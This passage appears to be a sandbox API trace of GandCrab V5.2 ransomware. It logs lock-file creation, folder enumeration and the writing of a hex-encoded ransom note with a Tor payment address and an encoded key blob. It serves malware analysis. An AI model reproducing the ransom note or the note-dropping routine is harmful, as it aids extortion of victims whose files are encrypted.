70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.340] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0096.340] CloseHandle (hObject=0x2ac) returned 1 [0096.340] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.341] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.341] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x294)) [0096.341] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.341] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.341] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.342] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock") returned 60 [0096.342] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\documents\\my music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0096.351] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.351] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.352] lstrlenW (lpString="C:\\Users\\Default\\Documents\\My Music\\") returned 36 [0096.352] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*") returned="C:\\Users\\Default\\Documents\\My Music\\*" [0096.352] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.352] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0xffffffff [0096.352] CloseHandle (hObject=0x2ac) returned 1 [0096.352] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.352] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0096.352] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0096.352] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0096.352] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0096.352] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.353] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.353] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.354] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.354] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt") returned 60 [0096.354] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0096.355] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\